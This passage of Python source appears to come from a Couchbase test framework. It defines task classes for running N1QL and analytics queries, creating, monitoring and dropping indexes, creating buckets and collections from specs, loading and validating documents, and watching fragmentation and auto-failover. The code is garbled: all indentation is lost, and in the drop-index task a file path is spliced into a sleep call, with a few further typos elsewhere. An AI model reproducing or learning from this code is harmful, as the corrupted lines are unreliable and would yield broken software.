if query_type == "n1ql":
self.n1ql_helper = helper
if query_type == "cbas":
self.cbas_util = helper
self.task_manager = task_manager
self.run_infinitely = run_infinitely
self.parallelism = parallelism
self.query_tasks = []
self.result = []
self.is_prepared = is_prepared
self.debug_msg = self.query_type + "-DEBUG-"
def call(self):
start = 0
end = self.parallelism
self.start_task()
try:
if not self.is_prepared:
if self.query_type == "cbas":
self.prepare_cbas_queries()
elif self.query_type == "n1ql":
self.prepare_n1ql_queries()
while True:
for query in self.queries[start:end]:
if hasattr(self, "n1ql_helper"):
query_task = N1QLQueryTask(self.server, "", query,
n1ql_helper=self.n1ql_helper,
verify_results=False,
is_explain_query=True)
self.task_manager.add_new_task(query_task)
self.query_tasks.append(query_task)
if hasattr(self, "cbas_util"):
query_task = CBASQueryExecuteTask(
self.cluster, self.cbas_util, None, query)
self.task_manager.add_new_task(query_task)
self.query_tasks.append(query_task)
for query_task in self.query_tasks:
self.task_manager.get_task_result(query_task)
self.log.info(self.debug_msg + "ActualResult: " + str(
query_task.actual_result))
if not self.run_infinitely:
self.result.append(query_task.actual_result)
self.query_tasks = []
start = end
end += self.parallelism
if start >= len(self.queries):
if self.run_infinitely:
start = 0
end = self.parallelism
else:
break
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
return
self.complete_task()
def prepare_cbas_queries(self):
datasets = self.cbas_util.get_datasets(self.cluster, retries=20)
if not datasets:
self.set_exception(Exception("Datasets not available"))
prepared_queries = []
for query in self.queries:
for dataset in datasets:
prepared_queries.append(query.format(CBASHelper.format_name(
dataset)))
self.queries = prepared_queries
self.log.info(self.debug_msg + str(self.queries))
def prepare_n1ql_queries(self):
buckets = self.n1ql_helper.buckets
prepared_queries = []
bucket_helper = BucketHelper(self.server)
for bucket in buckets:
status, content = bucket_helper.list_collections(
bucket.name)
if status:
content = json.loads(content)
for scope in content["scopes"]:
for collection in scope["collections"]:
keyspace = CBASHelper.format_name(bucket.name,
scope["name"],
collection["name"])
prepared_queries.extend([query.format(keyspace) for
query in self.queries])
self.queries = prepared_queries
class N1QLTxnQueryTask(Task):
def __init__(self, stmts, n1ql_helper,
commit=True,
scan_consistency='REQUEST_PLUS'):
super(N1QLTxnQueryTask, self).__init__("query_n1ql_task_%s"
% (time.time()))
self.stmt = stmts
self.scan_consistency = scan_consistency
self.commit = commit
self.n1ql_helper = n1ql_helper
def call(self):
self.start_task()
try:
# Query and get results
self.test_log.info(" <<<<< START Executing N1ql Transaction >>>>>>")
sleep(5)
self.query_params = self.n1ql_helper.create_txn()
for query in self.stmt:
result = self.n1ql_helper.run_cbq_query(query,
query_params=self.query_params)
sleep(2)
self.n1ql_helper.end_txn(self.query_params, self.commit)
self.test_log.debug(" <<<<< Done Executing N1ql Transaction >>>>>>")
self.test_log.info("Expected Query to fail but passed")
# catch and set all unexpected exceptions
except Exception:
self.test_log.info(" <<<<< Query Failed as Expected >>>>>>")
class CreateIndexTask(Task):
def __init__(self, server, bucket, index_name, query, n1ql_helper=None,
retry_time=2, defer_build=False, timeout=240):
super(CreateIndexTask, self).__init__("Task_create_index_%s_%s"
% (bucket, index_name))
self.server = server
self.bucket = bucket
self.defer_build = defer_build
self.query = query
self.index_name = index_name
self.n1ql_helper = n1ql_helper
self.retry_time = retry_time
self.retried = 0
self.timeout = timeout
def call(self):
self.start_task()
try:
# Query and get results
self.n1ql_helper.run_cbq_query(query=self.query, server=self.server)
self.result = self.check()
self.complete_task()
return self.result
except CreateIndexException as e:
self.test_log.debug("Initial query failed. Will retry..")
if self.retried < self.retry_time:
self.retried += 1
sleep(self.retry_time)
self.call()
# catch and set all unexpected exceptions
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
def check(self):
try:
# Verify correctness of result set
check = True
if not self.defer_build:
check = self.n1ql_helper.is_index_online_and_in_list(
self.bucket, self.index_name, server=self.server,
timeout=self.timeout)
if not check:
raise CreateIndexException("Index {0} not created as expected"
.format(self.index_name))
return check
except CreateIndexException as e:
# subsequent query failed! exit
self.test_log.error(e)
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
class BuildIndexTask(Task):
def __init__(self, server, bucket, query, n1ql_helper=None,
retry_time=2):
super(BuildIndexTask, self).__init__("Task_Build_index_%s_%s"
% (bucket, query))
self.server = server
self.bucket = bucket
self.query = query
self.n1ql_helper = n1ql_helper
self.retry_time = retry_time
self.retried = 0
def call(self):
self.start_task()
try:
# Query and get results
self.n1ql_helper.run_cbq_query(query=self.query,
server=self.server)
self.result = self.check()
self.complete_task()
return self.result
except CreateIndexException as e:
self.test_log.debug("Initial query failed, will retry..")
if self.retried < self.retry_time:
self.retried += 1
sleep(self.retry_time)
self.call()
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
def check(self):
try:
# Verify correctness of result set
return True
except CreateIndexException as e:
# subsequent query failed! exit
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
class MonitorIndexTask(Task):
def __init__(self, server, bucket, index_name, n1ql_helper=None,
retry_time=2, timeout=240):
super(MonitorIndexTask, self).__init__("build_index_task_%s_%s"
% (bucket, index_name))
self.server = server
self.bucket = bucket
self.index_name = index_name
self.n1ql_helper = n1ql_helper
self.retry_time = 2
self.timeout = timeout
def call(self):
self.start_task()
try:
check = self.n1ql_helper.is_index_online_and_in_list(
self.bucket, self.index_name, server=self.server,
timeout=self.timeout)
if not check:
raise CreateIndexException("Index {0} not created as expected"
.format(self.index_name))
return_value = self.check()
self.complete_task()
return return_value
except CreateIndexException as e:
# initial query failed, try again
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
def check(self):
try:
return True
except CreateIndexException as e:
# subsequent query failed! exit
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
class DropIndexTask(Task):
def __init__(self, server, bucket, index_name, query, n1ql_helper=None,
retry_time=2):
super(DropIndexTask, self).__init__("drop_index_task")
self.server = server
self.bucket = bucket
self.query = query
self.index_name = index_name
self.n1ql_helper = n1ql_helper
self.timeout = 900
self.retry_time = 2
self.retried = 0
def call(self):
self.start_task()
try:
# Query and get results
check = self.n1ql_helper._is_index_in_list(
self.bucket, self.index_name, server=self.server)
if not check:
raise DropIndexException(
"index {0} does not exist will not drop"
.format(self.index_name))
self.n1ql_helper.run_cbq_query(query=self.query, server=self.server)
return_value = self.check()
except N1QLQueryException as e:
self.test_log.debug("Initial query failed, will retry..")
if self.retried < self.retry_time:
self.retried += 1
sleep(self.retry_timlib / membase / api / rest_client.pye)
self.call()
# catch and set all unexpected exceptions
except DropIndexException as e:
self.setexception(e)
def check(self):
try:
# Verify correctness of result set
check = self.n1ql_helper._is_index_in_list(
self.bucket, self.index_name, server=self.server)
if check:
raise Exception("Index {0} not dropped as expected"
.format(self.index_name))
return True
except DropIndexException as e:
# subsequent query failed! exit
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
class PrintBucketStats(Task):
def __init__(self, cluster, bucket, monitor_stats=list(), sleep=1):
super(PrintBucketStats, self).__init__("PrintBucketStats_%s_%s"
% (bucket.name, time.time()))
self.cluster = cluster
self.bucket = bucket
self.bucket_helper = BucketHelper(self.cluster.master)
self.sleep = sleep
self.monitor_stats = monitor_stats
self.stop_task = False
# To avoid running a dummy task
if len(monitor_stats) == 0:
self.stop_task = True
# List of stats to track / plot
self.ops_rate_trend = list()
self.drain_rate_trend = list()
def record_bucket_ops(self, bucket_stats, ops_rate):
if 'op' in bucket_stats and \
'samples' in bucket_stats['op'] and \
'ops' in bucket_stats['op']['samples']:
ops = bucket_stats['op']['samples']['ops'][-1]
self.test_log.debug("Ops rate for '%s': %f"
% (self.bucket.name, ops))
if ops_rate and ops_rate[-1] > ops:
self.ops_rate_trend.append(ops_rate)
ops_rate = list()
ops_rate.append(ops)
return ops_rate
def print_ep_queue_size(self, bucket_stats):
if 'op' in bucket_stats \
and 'samples' in bucket_stats['op'] \
and 'ep_queue_size' in bucket_stats['op']['samples']:
ep_q_size = bucket_stats['op']['samples']['ep_queue_size'][-1]
self.test_log.debug("ep_queue_size for {}: {}\
".format(self.bucket.name, ep_q_size))
def plot_all_graphs(self):
plot_graph(self.test_log, self.bucket.name, self.ops_rate_trend)
def end_task(self):
self.stop_task = True
def call(self):
self.start_task()
ops_rate = list()
while not self.stop_task:
try:
bucket_stats = \
self.bucket_helper.fetch_bucket_stats(self.bucket.name)
except Exception as e:
self.log.warning("Exception while fetching bucket stats: %s"
% e)
sleep(2, message="Updating BucketHelper with new master",
log_type="infra")
self.bucket_helper = BucketHelper(self.cluster.master)
continue
if "doc_ops" in self.monitor_stats:
ops_rate = self.record_bucket_ops(bucket_stats, ops_rate)
elif "drain_rate" in self.monitor_stats:
self.record_drain_rate(bucket_stats)
if "ep_queue_size" in self.monitor_stats:
self.print_ep_queue_size(bucket_stats)
# Sleep before fetching next stats
sleep(self.sleep, log_type="infra")
if ops_rate:
self.ops_rate_trend.append(ops_rate)
self.plot_all_graphs()
self.complete_task()
class BucketCreateTask(Task):
def __init__(self, server, bucket):
super(BucketCreateTask, self).__init__("bucket_%s_create_task"
% bucket.name)
self.server = server
self.bucket = bucket
self.bucket_priority = 8
if self.bucket.priority is None \
or self.bucket.priority == Bucket.Priority.LOW:
self.bucket_priority = 3
self.retries = 0
def call(self):
try:
rest = RestConnection(self.server)
except ServerUnavailableException as error:
self.log.error("RestConnection failed for {0}: {1}"
.format(self.server.ip, error))
self.result = False
return
info = rest.get_nodes_self()
if self.bucket.ramQuotaMB <= 0:
self.size = info.memoryQuota * 2 / 3
if int(info.port) in xrange(9091, 9991):
try:
self.port = info.port
BucketHelper(self.server).create_bucket(self.bucket.__dict__)
# return_value = self.check()
self.complete_task()
self.result = True
return
except Exception as e:
self.test_log.error(str(e))
self.set_exception(e)
version = rest.get_nodes_self().version
try:
if float(version[:2]) >= 3.0 and self.bucket_priority is not None:
self.bucket.threadsNumber = self.bucket_priority
BucketHelper(self.server).create_bucket(self.bucket.__dict__)
# return_value = self.check()
self.complete_task()
self.result = True
return
except BucketCreationException as e:
self.result = False
self.test_log.error(str(e))
# catch and set all unexpected exceptions
except Exception as e:
self.result = False
self.test_log.error(str(e))
def check(self):
try:
# if self.bucket.bucketType == 'memcached' or \
# int(self.server.port) in xrange(9091, 9991):
# return True
if MemcachedHelper.wait_for_memcached(self.server,
self.bucket.name):
self.test_log.debug(
"Bucket '{0}' created with per node RAM quota: {1}"
.format(self.bucket, self.bucket.ramQuotaMB))
return True
else:
self.test_log.error("Vbucket map not ready after try %s"
% self.retries)
if self.retries >= 5:
return False
except Exception as e:
self.test_log.warn(
"Exception: {0}. vbucket map not ready after try {1}"
.format(e, self.retries))
if self.retries >= 5:
self.result = False
self.test_log.error(str(e))
self.retries = self.retris + 1
sleep(5, "Wait for vBucket map to be ready", log_type="infra")
self.check()
class BucketCreateFromSpecTask(Task):
def __init__(self, task_manager, kv_nodes, bucket_name, bucket_spec):
super(BucketCreateFromSpecTask, self) \
.__init__("Bucket_create_task_%s" % bucket_name)
self.task_manager = task_manager
self.servers = kv_nodes
self.bucket_spec = bucket_spec
self.bucket_spec["name"] = bucket_name
self.retries = 0
self.rest = RestConnection(self.servers[0])
self.bucket_helper = BucketHelper(self.servers[0])
# Used to store the Created Bucket() object, for appending into
# bucket_utils.buckets list
self.bucket_obj = Bucket()
def call(self):
self.result = True
self.start_task()
bucket_params = Bucket.get_params()
for key, value in self.bucket_spec.items():
if key in bucket_params:
setattr(self.bucket_obj, key, value)
self.create_bucket()
if CbServer.default_collection not in \
self.bucket_spec[
"scopes"][CbServer.default_scope][
"collections"].keys():
self.bucket_helper.delete_collection(self.bucket_spec["name"],
CbServer.default_scope,
CbServer.default_collection)
self.bucket_obj \
.scopes[CbServer.default_scope] \
.collections \
.pop(CbServer.default_collection, None)
if self.bucket_spec[
MetaConstants.CREATE_COLLECTIONS_USING_MANIFEST_IMPORT]:
self.create_collections_using_manifest_import()
for scope_name, scope_spec in self.bucket_spec["scopes"].items():
scope_spec["name"] = scope_name
for collection_name, collection_spec \
in scope_spec["collections"].items():
if collection_name == CbServer.default_collection:
continue
collection_spec["name"] = collection_name
else:
for scope_name, scope_spec in self.bucket_spec["scopes"].items():
scope_spec["name"] = scope_name
scope_create_thread = threading.Thread(
target=self.create_scope_from_spec,
args=[scope_spec])
scope_create_thread.start()
scope_create_thread.join()
self.complete_task()
def create_collections_using_manifest_import(self):
json_content = dict()
json_content["scopes"] = list()
for s_name, s_dict in self.bucket_spec["scopes"].items():
scope = dict()
scope["name"] = s_name
scope["collections"] = list()
for c_name, c_dict in s_dict["collections"].items():
col = dict()
col["name"] = c_name
if "maxTTL" in c_dict:
col["maxTTL"] = c_dict["maxTTL"]
scope["collections"].append(col)
json_content["scopes"].append(scope)
self.bucket_helper.import_collection_using_manifest(
self.bucket_spec["name"], str(json_content).replace("'", '"'))
def create_bucket(self):
self.bucket_obj.threadsNumber = 3
if str(self.bucket_obj.priority) == "high" \
or str(self.bucket_obj.priority) == str(Bucket.Priority.HIGH):
self.bucket_obj.threadsNumber = 8
try:
self.bucket_helper.create_bucket(self.bucket_obj.__dict__)
except BucketCreationException as e:
self.result = False
self.test_log.error(str(e))
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.result = False
self.test_log.error(str(e))
self.set_exception(e)
def create_scope_from_spec(self, scope_spec):
self.test_log.debug("Creating scope for '%s' - %s"
% (self.bucket_obj.name, scope_spec["name"]))
if scope_spec["name"] != CbServer.default_scope:
status, content = self.bucket_helper.create_scope(
self.bucket_obj.name,
scope_spec["name"])
if status is False:
self.set_exception("Create scope failed for %s:%s, "
"Reason - %s"
% (self.bucket_obj.name,
scope_spec["name"],
content))
self.result = False
return
self.bucket_obj.stats.increment_manifest_uid()
for collection_name, collection_spec \
in scope_spec["collections"].items():
if collection_name == CbServer.default_collection:
continue
collection_spec["name"] = collection_name
collection_create_thread = threading.Thread(
target=self.create_collection_from_spec,
args=[scope_spec["name"], collection_spec])
collection_create_thread.start()
collection_create_thread.join(30)
def create_collection_from_spec(self, scope_name, collection_spec):
self.test_log.debug("Creating collection for '%s:%s' - %s"
% (self.bucket_obj.name, scope_name,
collection_spec["name"]))
status, content = self.bucket_helper.create_collection(
self.bucket_obj.name,
scope_name,
collection_spec)
if status is False:
self.result = False
self.set_exception("Create collection failed for "
"%s:%s:%s, Reason - %s"
% (self.bucket_obj.name,
scope_name,
collection_spec["name"],
content))
self.bucket_obj.stats.increment_manifest_uid()
class MutateDocsFromSpecTask(Task):
def __init__(self, cluster, task_manager, loader_spec,
sdk_client_pool,
batch_size=500,
process_concurrency=1,
print_ops_rate=True,
track_failures=True):
super(MutateDocsFromSpecTask, self).__init__(
"MutateDocsFromSpecTask_%s" % time.time())
self.cluster = cluster
self.task_manager = task_manager
self.loader_spec = loader_spec
self.process_concurrency = process_concurrency
self.batch_size = batch_size
self.print_ops_rate = print_ops_rate
self.result = True
self.load_gen_tasks = list()
self.load_subdoc_gen_tasks = list()
self.print_ops_rate_tasks = list()
self.sdk_client_pool = sdk_client_pool
self.track_failures = track_failures
def call(self):
self.start_task()
self.get_tasks()
self.execute_tasks(execute_tasks=self.load_gen_tasks)
self.execute_tasks(execute_tasks=self.load_subdoc_gen_tasks)
self.complete_task()
return self.result
def execute_tasks(self, execute_tasks):
if self.print_ops_rate:
for bucket in self.loader_spec.keys():
bucket.stats.manage_task(
"start", self.task_manager,
cluster=self.cluster,
bucket=bucket,
monitor_stats=["doc_ops"],
sleep=1)
try:
for task in execute_tasks:
self.task_manager.add_new_task(task)
for task in execute_tasks:
try:
self.task_manager.get_task_result(task)
self.log.debug("Items loaded in task %s are %s"
% (task.thread_name, task.docs_loaded))
i = 0
while task.docs_loaded < (task.generator._doc_gen.end -
task.generator._doc_gen.start) \
and i < 60:
sleep(1, "Bug in java futures task. "
"Items loaded in task %s: %s"
% (task.thread_name, task.docs_loaded),
log_type="infra")
i += 1
except Exception as e:
self.test_log.error(e)
finally:
self.loader_spec[
task.bucket]["scopes"][
task.scope]["collections"][
task.collection][
task.op_type]["success"].update(task.success)
self.loader_spec[
task.bucket]["scopes"][
task.scope]["collections"][
task.collection][
task.op_type]["fail"].update(task.fail)
if task.fail.__len__() != 0:
target_log = self.test_log.error
self.result = False
else:
target_log = self.test_log.debug
target_log("Failed to load %d docs from %d to %d of thread_name %s"
% (task.fail.__len__(),
task.generator._doc_gen.start,
task.generator._doc_gen.end,
task.thread_name))
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
finally:
if self.print_ops_rate:
for bucket in self.loader_spec.keys():
bucket.stats.manage_task(
"stop", self.task_manager,
cluster=self.cluster,
bucket=bucket,
monitor_stats=["doc_ops"],
sleep=1)
self.log.debug("========= Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("======================================")
for task in execute_tasks:
self.task_manager.stop_task(task)
self.log.debug("Task '%s' complete. Loaded %s items"
% (task.thread_name, task.docs_loaded))
def create_tasks_for_bucket(self, bucket, scope_dict):
load_gen_for_scopes_create_threads = list()
for scope_name, collection_dict in scope_dict.items():
scope_thread = threading.Thread(
target=self.create_tasks_for_scope,
args=[bucket, scope_name, collection_dict["collections"]])
scope_thread.start()
load_gen_for_scopes_create_threads.append(scope_thread)
for scope_thread in load_gen_for_scopes_create_threads:
scope_thread.join(120)
def create_tasks_for_scope(self, bucket, scope_name, collection_dict):
load_gen_for_collection_create_threads = list()
for c_name, c_data in collection_dict.items():
collection_thread = threading.Thread(
target=self.create_tasks_for_collections,
args=[bucket, scope_name, c_name, c_data])
collection_thread.start()
load_gen_for_collection_create_threads.append(collection_thread)
for collection_thread in load_gen_for_collection_create_threads:
collection_thread.join(60)
def create_tasks_for_collections(self, bucket, scope_name,
col_name, col_meta):
for op_type, op_data in col_meta.items():
# Create success, fail dict per load_gen task
op_data["success"] = dict()
op_data["fail"] = dict()
generators = list()
generator = op_data["doc_gen"]
gen_start = int(generator.start)
gen_end = int(generator.end)
gen_range = max(int((generator.end - generator.start)
/ self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for doc_gen in generators:
task_id = "%s_%s_%s_%s_ttl=%s" % (self.thread_name,
bucket.name,
scope_name, col_name,
op_data["doc_ttl"])
if op_type in DocLoading.Bucket.DOC_OPS:
track_failures = op_data.get("track_failures",
self.track_failures)
doc_load_task = LoadDocumentsTask(
self.cluster, bucket, None, doc_gen,
op_type, op_data["doc_ttl"],
scope=scope_name, collection=col_name,
task_identifier=task_id,
sdk_client_pool=self.sdk_client_pool,
batch_size=self.batch_size,
durability=op_data["durability_level"],
timeout_secs=op_data["sdk_timeout"],
time_unit=op_data["sdk_timeout_unit"],
skip_read_on_error=op_data["skip_read_on_error"],
suppress_error_table=op_data["suppress_error_table"],
track_failures=track_failures,
skip_read_success_results=op_data[
"skip_read_success_results"])
self.load_gen_tasks.append(doc_load_task)
elif op_type in DocLoading.Bucket.SUB_DOC_OPS:
subdoc_load_task = LoadSubDocumentsTask(
self.cluster, bucket, None, doc_gen,
op_type, op_data["doc_ttl"],
create_paths=True,
xattr=op_data["xattr_test"],
scope=scope_name, collection=col_name,
task_identifier=task_id,
sdk_client_pool=self.sdk_client_pool,
batch_size=self.batch_size,
durability=op_data["durability_level"],
timeout_secs=op_data["sdk_timeout"],
time_unit=op_data["sdk_timeout_unit"],
skip_read_success_results=op_data[
"skip_read_success_results"])
self.load_subdoc_gen_tasks.append(subdoc_load_task)
def get_tasks(self):
tasks = list()
load_gen_for_bucket_create_threads = list()
for bucket, scope_dict in self.loader_spec.items():
bucket_thread = threading.Thread(
target=self.create_tasks_for_bucket,
args=[bucket, scope_dict["scopes"]])
bucket_thread.start()
load_gen_for_bucket_create_threads.append(bucket_thread)
for bucket_thread in load_gen_for_bucket_create_threads:
bucket_thread.join(timeout=180)
return tasks
class ValidateDocsFromSpecTask(Task):
def __init__(self, cluster, task_manager, loader_spec,
sdk_client_pool, check_replica=False,
batch_size=500,
process_concurrency=1):
super(ValidateDocsFromSpecTask, self).__init__(
"ValidateDocsFromSpecTask_%s" % time.time())
self.cluster = cluster
self.task_manager = task_manager
self.loader_spec = loader_spec
self.process_concurrency = process_concurrency
self.batch_size = batch_size
self.check_replica = check_replica
self.result = True
self.validate_data_tasks = list()
self.validate_data_tasks_lock = Lock()
self.sdk_client_pool = sdk_client_pool
def call(self):
self.start_task()
self.get_tasks()
try:
for task in self.validate_data_tasks:
self.task_manager.add_new_task(task)
for task in self.validate_data_tasks:
self.task_manager.get_task_result(task)
except Exception as e:
self.result = False
self.log.debug("========= Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("======================================")
for task in self.validate_data_tasks:
self.task_manager.stop_task(task)
self.log.debug("Task '%s' complete. Loaded %s items"
% (task.thread_name, task.docs_loaded))
self.test_log.error(e)
self.set_exception(e)
self.complete_task()
return self.result
def create_tasks_for_bucket(self, bucket, scope_dict):
load_gen_for_scopes_create_threads = list()
for scope_name, collection_dict in scope_dict.items():
scope_thread = threading.Thread(
target=self.create_tasks_for_scope,
args=[bucket, scope_name, collection_dict["collections"]])
scope_thread.start()
load_gen_for_scopes_create_threads.append(scope_thread)
for scope_thread in load_gen_for_scopes_create_threads:
scope_thread.join(120)
def create_tasks_for_scope(self, bucket, scope_name, collection_dict):
load_gen_for_collection_create_threads = list()
for c_name, c_data in collection_dict.items():
collection_thread = threading.Thread(
target=self.create_tasks_for_collections,
args=[bucket, scope_name, c_name, c_data])
collection_thread.start()
load_gen_for_collection_create_threads.append(collection_thread)
for collection_thread in load_gen_for_collection_create_threads:
collection_thread.join(60)
def create_tasks_for_collections(self, bucket, scope_name,
col_name, col_meta):
for op_type, op_data in col_meta.items():
# Create success, fail dict per load_gen task
op_data["success"] = dict()
op_data["fail"] = dict()
generators = list()
generator = op_data["doc_gen"]
gen_start = int(generator.start)
gen_end = int(generator.end)
gen_range = max(int((generator.end - generator.start)
/ self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for doc_gen in generators:
if op_type in DocLoading.Bucket.DOC_OPS:
if op_data["doc_ttl"] > 0:
op_type = DocLoading.Bucket.DocOps.DELETE
task = ValidateDocumentsTask(
self.cluster, bucket, None, doc_gen,
op_type, op_data["doc_ttl"],
None, batch_size=self.batch_size,
timeout_secs=op_data["sdk_timeout"],
compression=None, check_replica=self.check_replica,
scope=scope_name, collection=col_name,
sdk_client_pool=self.sdk_client_pool,
is_sub_doc=False,
suppress_error_table=op_data["suppress_error_table"])
self.validate_data_tasks.append(task)
def get_tasks(self):
tasks = list()
bucket_validation_threads = list()
for bucket, scope_dict in self.loader_spec.items():
bucket_thread = threading.Thread(
target=self.create_tasks_for_bucket,
args=[bucket, scope_dict["scopes"]])
bucket_thread.start()
bucket_validation_threads.append(bucket_thread)
for bucket_thread in bucket_validation_threads:
bucket_thread.join(timeout=180)
return tasks
class MonitorActiveTask(Task):
"""
Attempt to monitor active task that is available in _active_tasks API.
It allows to monitor indexer, bucket compaction.
Execute function looks at _active_tasks API and tries to identifies
task for monitoring and its pid by:
task type('indexer' , 'bucket_compaction', 'view_compaction')
and target value (for example "_design/ddoc" for indexing,
bucket "default" for bucket compaction or
"_design/dev_view" for view compaction).
wait_task=True means that task should be found in the first attempt
otherwise, we can assume that the task has been completed(reached 100%)
Check function monitors task by pid that was identified in execute func
and matches new progress result with the previous.
task is failed if:
progress is not changed during num_iterations iteration
new progress was gotten less then previous
task is passed and completed if:
progress reached wait_progress value
task was not found by pid(believe that it's over)
"""
def __init__(self, server, type, target_value, wait_progress=100,
num_iterations=100, wait_task=True):
super(MonitorActiveTask, self).__init__("MonitorActiveTask_%s"
% server.ip)
self.server = server
self.type = type # indexer or bucket_compaction
self.target_key = ""
if self.type == 'indexer':
# no special actions
pass
elif self.type == "bucket_compaction":
self.target_key = "original_target"
elif self.type == "view_compaction":
self.target_key = "designDocument"
else:
raise Exception("type %s is not defined!" % self.type)
self.target_value = target_value
self.wait_progress = wait_progress
self.num_iterations = num_iterations
self.wait_task = wait_task
self.rest = RestConnection(self.server)
self.current_progress = None
self.current_iter = 0
self.task = None
def call(self):
tasks = self.rest.ns_server_tasks()
for task in tasks:
if task["type"] == self.type \
and ((self.target_key == "designDocument"
and task[self.target_key] == self.target_value)
or (self.target_key == "original_target"
and task[self.target_key][
"type"] == self.target_value)
or (self.type == 'indexer')):
self.current_progress = task["progress"]
self.task = task
self.test_log.debug(
"Monitoring active task was found:" + str(task))
self.test_log.debug("Progress %s:%s - %s %%"
% (self.type, self.target_value,
task["progress"]))
if self.current_progress >= self.wait_progress:
self.test_log.debug("Got expected progress: %s"
% self.current_progress)
self.result = True
if self.task is None:
# task is not performed
self.test_log.warning("Expected active task %s:%s was not found"
% (self.type, self.target_value))
self.result = True
elif self.wait_task:
self.test_log.debug("Polling for %s task to complete" % self.type)
self.check()
else:
# task was completed
self.test_log.debug("Task for monitoring %s:%s completed"
% (self.type, self.target_value))
self.result = True
def check(self):
tasks = self.rest.ns_server_tasks()
if self.task in tasks and self.task is not None:
for task in tasks:
# if task still exists
if task == self.task:
self.test_log.debug("Progress %s:%s - %s %%"
% (self.type, self.target_value,
task["progress"]))
# reached expected progress
if task["progress"] >= self.wait_progress:
self.test_log.info("Progress for task %s reached %s"
% (self.task, self.wait_progress))
self.result = True
return
# progress value was changed
if task["progress"] > self.current_progress:
self.current_progress = task["progress"]
self.current_iter = 0
self.check()
# progress value was not changed
elif task["progress"] == self.current_progress:
if self.current_iter < self.num_iterations:
sleep(2, "Wait for next progress update",
log_type="infra")
self.current_iter += 1
self.check()
else:
self.test_log.error(
"Progress not changed for %s during %s sec"
% (self.type, 2 * self.num_iterations))
self.result = False
return
else:
self.test_log.error(
"Progress for task %s:%s changed direction!"
% (self.type, self.target_value))
self.result = False
return
else:
self.test_log.info("Task %s completed on server" % self.task)
self.result = True
class MonitorDBFragmentationTask(Task):
"""
Attempt to monitor fragmentation that is occurring for a given bucket.
Note: If autocompaction is enabled and user attempts to monitor for
fragmentation value higher than level at which auto_compaction
kicks in a warning is sent and it is best user to use lower value
as this can lead to infinite monitoring.
"""
def __init__(self, server, fragmentation_value=10, bucket_name="default",
get_view_frag=False):
Task.__init__(self, "monitor_frag_db_task_%s_%s"
% (bucket_name, time.time()))
self.server = server
self.bucket_name = bucket_name
self.fragmentation_value = fragmentation_value
self.get_view_frag = get_view_frag
def check(self):
# sanity check of fragmentation value
if self.fragmentation_value < 0 or self.fragmentation_value > 100:
err_msg = "Invalid value for fragmentation %d" \
% self.fragmentation_value
self.set_exception(Exception(err_msg))
def call(self):
self.check()
self.start_task()
bucket_helper = BucketHelper(self.server)
while True:
try:
stats = bucket_helper.fetch_bucket_stats(self.bucket_name)
if self.get_view_frag:
new_frag_value = \
stats["op"]["samples"]["couch_views_fragmentation"][-1]
self.test_log.debug(
"Current amount of views fragmentation %d"
% new_frag_value)
else:
new_frag_value = \
stats["op"]["samples"]["couch_docs_fragmentation"][-1]
self.test_log.debug(
"Current amount of docs fragmentation %d"
% new_frag_value)
if new_frag_value >= self.fragmentation_value:
self.test_log.info("Fragmentation level: %d%%"
% new_frag_value)
self.set_result(True)
break
except Exception as ex:
self.set_result(False)
self.set_exception(ex)
self.test_log.debug("Wait for expected fragmentation level")
sleep(2)
self.complete_task()
class AutoFailoverNodesFailureTask(Task):
def __init__(self, task_manager, master, servers_to_fail, failure_type,
timeout, pause=0, expect_auto_failover=True, timeout_buffer=3,
check_for_failover=True, failure_timers=None,
disk_timeout=0, disk_location=None, disk_size=200,
auto_reprovision=False):
super(AutoFailoverNodesFailureTask, self) \
.__init__("AutoFailoverNodesFailureTask")
self.task_manager = task_manager
self.master = master
self.servers_to_fail = servers_to_fail
self.num_servers_to_fail = self.servers_to_fail.__len__()
self.itr = 0
self.failure_type = failure_type
self.timeout = timeout
self.pause = pause
self.expect_auto_failover = expect_auto_failover
self.check_for_autofailover = check_for_failover
self.start_time = 0
self.timeout_buffer = timeout_buffer
self.current_failure_node = self.servers_to_fail[0]
self.max_time_to_wait_for_failover = self.timeout + \
self.timeout_buffer + 180
self.disk_timeout = disk_timeout
self.disk_location = disk_location
self.disk_size = disk_size
if failure_timers is None:
failure_timers = list()
self.failure_timers = failure_timers
self.rebalance_in_progress = False
self.auto_reprovision = auto_reprovision
def check_failure_timer_task_start(self, timer_task, retry_count=5):
while retry_count != 0 and not timer_task.started:
sleep(1, "Wait for failover timer to start", log_type="infra")
retry_count -= 1
if retry_count == 0:
self.task_manager.stop_task(timer_task)
self.set_exception("Node failure task failed to start")
return False
return True
def call(self):
self.start_task()
rest = RestConnection(self.master)
if rest._rebalance_progress_status() == "running":
self.rebalance_in_progress = True
return_val = False
while self.has_next() and not self.completed:
self.next()
if self.pause > 0 and self.pause > self.timeout:
return_val = self.check()
if self.pause == 0 or 0 < self.pause < self.timeout:
return_val = self.check()
self.complete_task()
return return_val
def check(self):
if not self.check_for_autofailover:
return True
rest = RestConnection(self.master)
max_timeout = self.timeout + self.timeout_buffer + self.disk_timeout
if self.start_time == 0:
message = "Did not inject failure in the system."
rest.print_UI_logs(10)
